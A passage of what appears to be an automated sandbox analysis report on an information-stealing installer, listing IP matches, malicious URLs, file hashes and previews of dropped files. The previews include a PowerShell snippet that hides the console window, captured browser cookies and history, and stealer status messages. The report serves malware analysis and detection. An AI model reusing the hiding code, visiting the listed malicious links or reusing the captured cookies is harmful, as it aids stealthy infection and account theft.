                                                                                                                                                                                                                  file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                  • 104.26.13.205
                                                                                                                                                                                                                  https://www.canva.com/design/DAGSL2lLp_4/lQGTdiRa89y3fkgkaFc-uQ/edit?utm_content=DAGSL2lLp_4&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                  • 172.67.74.152
                                                                                                                                                                                                                  Bank Payment $38,735.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                  • 104.26.13.205
                                                                                                                                                                                                                  2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.67.74.152
                                                                                                                                                                                                                  2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.26.12.205
                                                                                                                                                                                                                  Shipping documents 000029393994400000000000.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                  • 104.26.13.205
                                                                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.67.74.152
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  CLOUDFLARENETUSmoba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                  • 104.22.74.216
                                                                                                                                                                                                                  Audio_Msg..00299229202324Transcript.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.17.25.14
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                  • 172.67.183.74
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.21.77.132
                                                                                                                                                                                                                  moba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                  • 104.18.20.226
                                                                                                                                                                                                                  https://wetransfer.com/downloads/fc718a7028ccd1e273879a61c0883fe420241001145250/8110e2eb5f5a56cc2015d1b3243d9b3120241001145309/33d289?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgridGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                  • 172.64.151.101
                                                                                                                                                                                                                  https://k7qo.sarnerholz.cam/APRjVfmkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.67.179.163
                                                                                                                                                                                                                  ELECTRONIC RECEIPT_Opcsa.htmlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                                                                                                                  • 172.67.74.152
                                                                                                                                                                                                                  PAYMENtT SLIP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  ATGS-MMD-ASUShttps://trk.mail.ru/c/kruxy7?clickid=mtg66f14a9e6633b800088f731w&mt_campaign=ss_mark_se_ios&mt_creat%20ive=m-%20se23.mp4&mt_gaid=&mt_idfa=&mt_network=mtg1206891918&mt_oaid=&mt_sub1=ss_mark_se_ios&mt_sub2=mtg12068%2091918&mt_sub3=1809824272&mt_sub5=ss_mark_se_iosGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.49.33.158
                                                                                                                                                                                                                  http://www.aieov.com/setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                  https://bestratedrobotvacuum.com/?bypass-cdn=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.23.59.145
                                                                                                                                                                                                                  https://wtm.ventes-privees-du-jour.com/r/eNplj92OmzAQRp+GvQwYbGNfRBVNwgblh61I0jQ3kTEmOAXsgoFNnr6utFppVcnSSOd845mZXApCiJCbs5xhHwkaMq/EwEMCc1wCRjGl3MOeC0iAXArdEmJaepgUhBKOwoJCQIUgBJU+CwoB3NCFrnK/DfPKGN07QeT4sX3TNM0q1TRCd3IUM64aC2Xb805qI1XrBLENL33iewR4nu/4eDDNtVdDx4UVk6htjxh1cf9QjSjk0FjFdf2BOGs0k7f2v7xomKwt7VQuOuNAz4hatMLMcmEtH3pjs921lF1vWtb8Gxi1rfwia/bpfibb7WqXWVvr66gtcfzgmiyvtrwUfJ4+1qCs1GnU/YrCyR4TK60aFU3idQ8ntNjW9+hZoTo/m7dl4PjfT7UZq27RguCy3hwOoZ/CanOkZnFKm8Oe4SnLJU5uXnywf50j/fb0ft/+8Et0eC2nJEu3krdIqEyy22bEjzBN90n9rLTMyO7Ml8kK3n+dH7dwWhNYgGP6owiHUdD7eRVnLOlHu8Lx/ZJ2uwc/BY8jgXGUDvsXJueAIgDJX8NYskg=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.22.248.172
                                                                                                                                                                                                                  (No subject) (82).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.149.66.134
                                                                                                                                                                                                                  SecuriteInfo.com.Linux.Siggen.9999.28931.8128.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 32.61.35.245
                                                                                                                                                                                                                  SecuriteInfo.com.Linux.Siggen.9999.30976.5557.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 34.45.16.133
                                                                                                                                                                                                                  SecuriteInfo.com.Linux.Siggen.9999.10361.13333.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 32.63.252.0
                                                                                                                                                                                                                  SecuriteInfo.com.Linux.Siggen.9999.28522.3483.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 32.157.103.69
                                                                                                                                                                                                                  https://polidos.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.36.150.185
                                                                                                                                                                                                                  CLOUDFLARENETUSmoba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                  • 104.22.74.216
                                                                                                                                                                                                                  Audio_Msg..00299229202324Transcript.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.17.25.14
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                  • 172.67.183.74
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.21.77.132
                                                                                                                                                                                                                  moba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                  • 104.18.20.226
                                                                                                                                                                                                                  https://wetransfer.com/downloads/fc718a7028ccd1e273879a61c0883fe420241001145250/8110e2eb5f5a56cc2015d1b3243d9b3120241001145309/33d289?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgridGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                  • 172.64.151.101
                                                                                                                                                                                                                  https://k7qo.sarnerholz.cam/APRjVfmkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.67.179.163
                                                                                                                                                                                                                  ELECTRONIC RECEIPT_Opcsa.htmlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                                                                                                                  • 172.67.74.152
                                                                                                                                                                                                                  PAYMENtT SLIP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\prebuilds\win32-x64\node.napi.nodeHogWarp.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        WorldWars Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          DungeOfDestiny Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            Game.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              Game.exeGet hashmaliciousNode StealerBrowse
                                                                                                                                                                                                                                OmteV2.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                  voicemixersetup.exeGet hashmaliciousNode StealerBrowse
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):367
                                                                                                                                                                                                                                    Entropy (8bit):4.87133404623229
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:rIQm/mAMLL+iNFs2SRaiP2hM/siNFs2SRkoSoODxLnRTZDsTLstSRz/:rDmug7I9OxLRTZD2Lwi
                                                                                                                                                                                                                                    MD5:85B08A656DD5E856766B6104136B6A96
                                                                                                                                                                                                                                    SHA1:28EE817E2BD7FC9FB018ED59981E4BC1A3B15A95
                                                                                                                                                                                                                                    SHA-256:D3DA2061327B09F1EBA1B9D5DB0C61DB24B9F6B13BAE96510BB791057067AB34
                                                                                                                                                                                                                                    SHA-512:79CFA7E12CF7087A9C452E8F730A926B932A466F4F8D3DBFDA7454B764A2D06DF48E0D8E0ABBF87B8EC9640320EE37E396B6B74BB92719FAD4AFBD07DEB8738E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:. Add-Type -Name Window -Namespace Console -MemberDefinition '. [DllImport("Kernel32.dll")]. public static extern IntPtr GetConsoleWindow();.. [DllImport("user32.dll")]. public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);. '.. $consolePtr = [Console.Window]::GetConsoleWindow(). [Console.Window]::ShowWindow($consolePtr, 0).
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):367
                                                                                                                                                                                                                                    Entropy (8bit):4.87133404623229
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:rIQm/mAMLL+iNFs2SRaiP2hM/siNFs2SRkoSoODxLnRTZDsTLstSRz/:rDmug7I9OxLRTZD2Lwi
                                                                                                                                                                                                                                    MD5:85B08A656DD5E856766B6104136B6A96
                                                                                                                                                                                                                                    SHA1:28EE817E2BD7FC9FB018ED59981E4BC1A3B15A95
                                                                                                                                                                                                                                    SHA-256:D3DA2061327B09F1EBA1B9D5DB0C61DB24B9F6B13BAE96510BB791057067AB34
                                                                                                                                                                                                                                    SHA-512:79CFA7E12CF7087A9C452E8F730A926B932A466F4F8D3DBFDA7454B764A2D06DF48E0D8E0ABBF87B8EC9640320EE37E396B6B74BB92719FAD4AFBD07DEB8738E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:. Add-Type -Name Window -Namespace Console -MemberDefinition '. [DllImport("Kernel32.dll")]. public static extern IntPtr GetConsoleWindow();.. [DllImport("user32.dll")]. public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);. '.. $consolePtr = [Console.Window]::GetConsoleWindow(). [Console.Window]::ShowWindow($consolePtr, 0).
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):22
                                                                                                                                                                                                                                    Entropy (8bit):3.2776134368191157
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:SWSKXB5LQ:lSKXvLQ
                                                                                                                                                                                                                                    MD5:1B62F8861D5FB6932E6BC28C2D629F80
                                                                                                                                                                                                                                    SHA1:8A35DBA7006B138C1EA87918A2373A52462FAE0D
                                                                                                                                                                                                                                    SHA-256:EC4181FA4DA153D819F2850B51A5697D1B68BB0FE005047897F911D7B0F1CDA3
                                                                                                                                                                                                                                    SHA-512:CE42BFC0DAFC54FD63A4A3F8DED46917D4D37E77E469A2E3D1F8D2EB8B2406CAD7E7FECEF7E40A39C143F323F9E8C8E28E12306485248E4040FA0D877BFFB9F3
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:no password found for
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):38
                                                                                                                                                                                                                                    Entropy (8bit):3.8301826981560274
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:PQRKcJW5KeBF3R3AV:PQRKcY5JFh3AV
                                                                                                                                                                                                                                    MD5:A9ABCDF8B95C77D28F375059735CF869
                                                                                                                                                                                                                                    SHA1:777D43D8EFF0B86F071B5BE1094A47C7A1E5CD6B
                                                                                                                                                                                                                                    SHA-256:3664D16D47D3E7CD460E115BE845C856BA01D8148CB1B322F46C92D1B7FAE87B
                                                                                                                                                                                                                                    SHA-512:9805838DB162353B7FFF8B4F780E4DD633C4ADA17A6484B60DC53C05CFB7DDCF6C9B5A8C2152E487AE1A8CEF16F2E9BC13069D5F7048D5203BB1664911214B3F
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:No autofills found for Google Default.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):38
                                                                                                                                                                                                                                    Entropy (8bit):3.984348238943494
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:MRn+nJF3R3AV:O+JFh3AV
                                                                                                                                                                                                                                    MD5:3CCDE141A644177CCFEF42671BC05729
                                                                                                                                                                                                                                    SHA1:2B836E8CE1CA28E305E784011888A482970814BF
                                                                                                                                                                                                                                    SHA-256:4B399E4980A0AB09BCB8263DFF5F2A3EBAF500995A98994536AB27D3021E5D7A
                                                                                                                                                                                                                                    SHA-512:1CE7D9431E18FAC1CCC0FE026593B625D7CF5CEFA677E4BBE061AEB92A0D8E11211E2DC4C772D00898433E15928AF52D57E782F42C2F210BF6350CBCAE4B96ED
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:No bookmarks found for Google Default.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (507)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):942
                                                                                                                                                                                                                                    Entropy (8bit):5.973720074479463
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:kAvKBKh8XShpJPjXfGnKb1zKb5Rms8/y3Vggtl+ul6vt:kAviCJpJPjRb1zKlfAyFg4Esgt
                                                                                                                                                                                                                                    MD5:146AB40A3EC90377216BF05885875AD7
                                                                                                                                                                                                                                    SHA1:104A322C48EA688AA3DA44DC8D82DD3397B7FF5B
                                                                                                                                                                                                                                    SHA-256:00960E4DBDB04A7C8226EF33527BAB67A4CF4920B149519C7CBB395E138B0B49
                                                                                                                                                                                                                                    SHA-512:3BFB5AB12AE06F7648861501F478BA138008409B4FF55D55231336FF1F50F25947B5A1FCA9854C6864911AFE09C91059CB3E9054164860025FED480EFDA90778
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:.google.com.TRUE./.FALSE.2597573456.NID.517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu.ogs.google.com.TRUE./.FALSE.2597573456.OTZ.7716220_48_52_123900_48_436380..adobe.com.TRUE./.FALSE.2597573456.ak_bmsc.20564E410B96EF3539889402094DE020~000000000000000000000000000000~YAAQlUxyaMEs4NiRAQAASccd2xm/y2Zo7QA6+Q0JfmISZOtGTwvrY8g71+hGy8kdY9wiebmazRy7kfEPoJuCS7nlQC4w97P/WsQ+PjoOMLUYYjcqMpuvJVziB2hx1UMsvrBkaUI6F6e2inlwc/YyN/io5dejGN//HclljEhd5EoYKGG+O+Sirx1+9Vh/xIqXfiaH1llrt9oHHD2EgbqLIhthuZhNjqmTDC4yfAdjNLYBLl5+O7OV+vCzqHuwhHvpjh4QmpgYmebYOaYOAqATcbZiw7Um8EFyJlThzgg7J7uJEpAdzDuBgKuyW1GocnGFmRE18jiPgQpim3rveATS1aqG7/pW/Xsc8e6ZMt4uCn6EJEQZdw2JmARwhc0QfOsw8ZBqfLp/fBhoQZk=.helpx.adobe.com.TRUE./.FALSE.2597573456.akaas_helpx_audience_segmentation_default.1727167648~rv=12~id=561ecf4a0966fc7609e5e1271a59bf55~rn=.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):14
                                                                                                                                                                                                                                    Entropy (8bit):3.2359263506290334
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:0Cln:jn
                                                                                                                                                                                                                                    MD5:53141EAFEAB294780AA9A86A7484510F
                                                                                                                                                                                                                                    SHA1:AD8925270C1A270F37B158147843FFCA3E157EFB
                                                                                                                                                                                                                                    SHA-256:F33C30531D5A9B7CEBDD5F470F30BE8C038B38185021C405F031E2DDFBA422FB
                                                                                                                                                                                                                                    SHA-512:86507915A541D3ECE8DA3B7DBBC6FB99F64853FA1460698EFF6B14322B2D904DD7B889F09C04DE1E12DCEAA1D59E70D94638173806F23D9F21850EA94152D484
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:no cards found
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1809
                                                                                                                                                                                                                                    Entropy (8bit):5.249407927208099
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:i8Mcew2AJkcdVcDcVcQH1kcNAkh+cKAkh+cruA:i85ew2AJxdGQGIl/w/6A
                                                                                                                                                                                                                                    MD5:F8261BD0635FD090111553F99872232A
                                                                                                                                                                                                                                    SHA1:48CD5596ACD7FB796812B0C5223D83244DF09943
                                                                                                                                                                                                                                    SHA-256:B3068B3B63A846E9AF7BC069F2E3C6BE5CA28E8676DADED72C194F8546C23B2B
                                                                                                                                                                                                                                    SHA-512:E7A7CAF4BD707EDABEAA42973A9EB372DB5C81E23A6A5042F0973EB816F48A6D4FBE454845B3D90AB5EEC9CA1645204E305744A5973E1A7D76E56083BC5364D9
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:================.URL: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_medium=et.Title: Google Chrome - The Fast & Secure Web Browser Built to be Yours.Last Visit Time: 13369750743103180.Application: Google Default.================.URL: https://www.google.com/search?q=eicar+test+file&oq=eicar+test+file&aqs=chrome..69i57j0i512l9.2756j0j4&sourceid=chrome&ie=UTF-8.Title: eicar test file - Google Search.Last Visit Time: 13335742402166306.Application: Google Default.================.URL: https://www.eicar.org/download-anti-malware-testfile/.Title: Download Anti Malware Testfile . Eicar.Last Visit Time: 13335742418083048.Application: Google Default.================.URL: https://secure.eicar.org/eicar.com.Title: .Last Visit Time: 13335742408142492.Application: Google Default.================.URL: https://secure.eicar.org/eicar.com.txt.Title: .Last Visit Time: 13335742414655748.Application: Google Default.================.URL: https://www.go
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):22
                                                                                                                                                                                                                                    Entropy (8bit):3.2776134368191157
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:SWSKXB5LQ:lSKXvLQ
                                                                                                                                                                                                                                    MD5:1B62F8861D5FB6932E6BC28C2D629F80
                                                                                                                                                                                                                                    SHA1:8A35DBA7006B138C1EA87918A2373A52462FAE0D
                                                                                                                                                                                                                                    SHA-256:EC4181FA4DA153D819F2850B51A5697D1B68BB0FE005047897F911D7B0F1CDA3
                                                                                                                                                                                                                                    SHA-512:CE42BFC0DAFC54FD63A4A3F8DED46917D4D37E77E469A2E3D1F8D2EB8B2406CAD7E7FECEF7E40A39C143F323F9E8C8E28E12306485248E4040FA0D877BFFB9F3
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:no password found for
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1265698
                                                                                                                                                                                                                                    Entropy (8bit):7.952269399870416
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:1wi1Kv/Lm9t8jXgwKdW4d1itUdFvhUsXTRSZJ92b6MgIJUjkeN6Bz+BZAID:B1KvMYKdYaXcnkb6MXJUjkYwCBZBD
                                                                                                                                                                                                                                    MD5:D6D77045BF9FE1D3932EB12C87FA5CCD
                                                                                                                                                                                                                                    SHA1:EC2C1C63FC653F3C3208D77377DDD85049A55232
                                                                                                                                                                                                                                    SHA-256:FD063CF06C03E3FDCF4D46E1FE04195E45B468C250E64C5E7F514AF48A5CDDB3
                                                                                                                                                                                                                                    SHA-512:08BA3A88F472CAF4FCDFE75CC6EB66BCF9424C03053865EB5740B7DBE63C735C6708176284FAB89BB459DA692E710154039EEDECB9D2FDDC71937ABDE9542BB5
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......8........C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..g...u..Vw....;?.tc..bwf...Xz...{.I...=)C...5.3#......J.V... ....'hA.:.....|.............Df.<.oVu}XM<{..t>.h3...|8.xb8g=..!.~F0..g..L.B...qv.q.._....'..3s....;.W.O6.X{.v.}...s.n..T3w..l.M...X..>Z..1...y.../.03..3.>..~....$;.8d{f..\....3..N.f......x...6.....w?.........-+..03.*..2...O.2.7.,........e....4Uf.[9..:.Y.0.W.\...e.).....bv.....+.?.A._.x^...:....8f>...t..{i<2j.....?z`B.3.3...E...oUbl...;...\...............s'.`...9.qr3f......{....{.2../..{...s....w~..wt...d.._MY...c.m.1../O..o...o}i.s#.}........{....}.*..lg.x_..c.....t^.Oe....{..o(.x}.-.Q.]..6.....~w....x.{+.....!V.~;.x...s...C.{.]....N......;....[0.fO......}..y.;....|{...{+..N...T....om.Z..`....j.....c.B..1........=.f..6.O..B............].5'..pke...*3..R..\>.q7.y.N)..q..y.;..f..5..w..5'....{C..|w...K..'.....S3{.u~..4k.+....753G.X[..O*.>...s..M.....'.g..o.s.K.\Y.kX[X{...:.(-.
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):38
                                                                                                                                                                                                                                    Entropy (8bit):3.8301826981560274
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:PQRKcJW5KeBF3R3AV:PQRKcY5JFh3AV
                                                                                                                                                                                                                                    MD5:A9ABCDF8B95C77D28F375059735CF869
                                                                                                                                                                                                                                    SHA1:777D43D8EFF0B86F071B5BE1094A47C7A1E5CD6B
                                                                                                                                                                                                                                    SHA-256:3664D16D47D3E7CD460E115BE845C856BA01D8148CB1B322F46C92D1B7FAE87B
                                                                                                                                                                                                                                    SHA-512:9805838DB162353B7FFF8B4F780E4DD633C4ADA17A6484B60DC53C05CFB7DDCF6C9B5A8C2152E487AE1A8CEF16F2E9BC13069D5F7048D5203BB1664911214B3F
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:No autofills found for Google Default.
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):38
                                                                                                                                                                                                                                    Entropy (8bit):3.984348238943494
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:MRn+nJF3R3AV:O+JFh3AV
                                                                                                                                                                                                                                    MD5:3CCDE141A644177CCFEF42671BC05729
                                                                                                                                                                                                                                    SHA1:2B836E8CE1CA28E305E784011888A482970814BF
                                                                                                                                                                                                                                    SHA-256:4B399E4980A0AB09BCB8263DFF5F2A3EBAF500995A98994536AB27D3021E5D7A
                                                                                                                                                                                                                                    SHA-512:1CE7D9431E18FAC1CCC0FE026593B625D7CF5CEFA677E4BBE061AEB92A0D8E11211E2DC4C772D00898433E15928AF52D57E782F42C2F210BF6350CBCAE4B96ED
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:No bookmarks found for Google Default.
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (507)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):942
                                                                                                                                                                                                                                    Entropy (8bit):5.973720074479463
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:kAvKBKh8XShpJPjXfGnKb1zKb5Rms8/y3Vggtl+ul6vt:kAviCJpJPjRb1zKlfAyFg4Esgt
                                                                                                                                                                                                                                    MD5:146AB40A3EC90377216BF05885875AD7
                                                                                                                                                                                                                                    SHA1:104A322C48EA688AA3DA44DC8D82DD3397B7FF5B
                                                                                                                                                                                                                                    SHA-256:00960E4DBDB04A7C8226EF33527BAB67A4CF4920B149519C7CBB395E138B0B49
                                                                                                                                                                                                                                    SHA-512:3BFB5AB12AE06F7648861501F478BA138008409B4FF55D55231336FF1F50F25947B5A1FCA9854C6864911AFE09C91059CB3E9054164860025FED480EFDA90778
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:.google.com.TRUE./.FALSE.2597573456.NID.517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu.ogs.google.com.TRUE./.FALSE.2597573456.OTZ.7716220_48_52_123900_48_436380..adobe.com.TRUE./.FALSE.2597573456.ak_bmsc.20564E410B96EF3539889402094DE020~000000000000000000000000000000~YAAQlUxyaMEs4NiRAQAASccd2xm/y2Zo7QA6+Q0JfmISZOtGTwvrY8g71+hGy8kdY9wiebmazRy7kfEPoJuCS7nlQC4w97P/WsQ+PjoOMLUYYjcqMpuvJVziB2hx1UMsvrBkaUI6F6e2inlwc/YyN/io5dejGN//HclljEhd5EoYKGG+O+Sirx1+9Vh/xIqXfiaH1llrt9oHHD2EgbqLIhthuZhNjqmTDC4yfAdjNLYBLl5+O7OV+vCzqHuwhHvpjh4QmpgYmebYOaYOAqATcbZiw7Um8EFyJlThzgg7J7uJEpAdzDuBgKuyW1GocnGFmRE18jiPgQpim3rveATS1aqG7/pW/Xsc8e6ZMt4uCn6EJEQZdw2JmARwhc0QfOsw8ZBqfLp/fBhoQZk=.helpx.adobe.com.TRUE./.FALSE.2597573456.akaas_helpx_audience_segmentation_default.1727167648~rv=12~id=561ecf4a0966fc7609e5e1271a59bf55~rn=.
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):14
                                                                                                                                                                                                                                    Entropy (8bit):3.2359263506290334
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:0Cln:jn
                                                                                                                                                                                                                                    MD5:53141EAFEAB294780AA9A86A7484510F
                                                                                                                                                                                                                                    SHA1:AD8925270C1A270F37B158147843FFCA3E157EFB
                                                                                                                                                                                                                                    SHA-256:F33C30531D5A9B7CEBDD5F470F30BE8C038B38185021C405F031E2DDFBA422FB
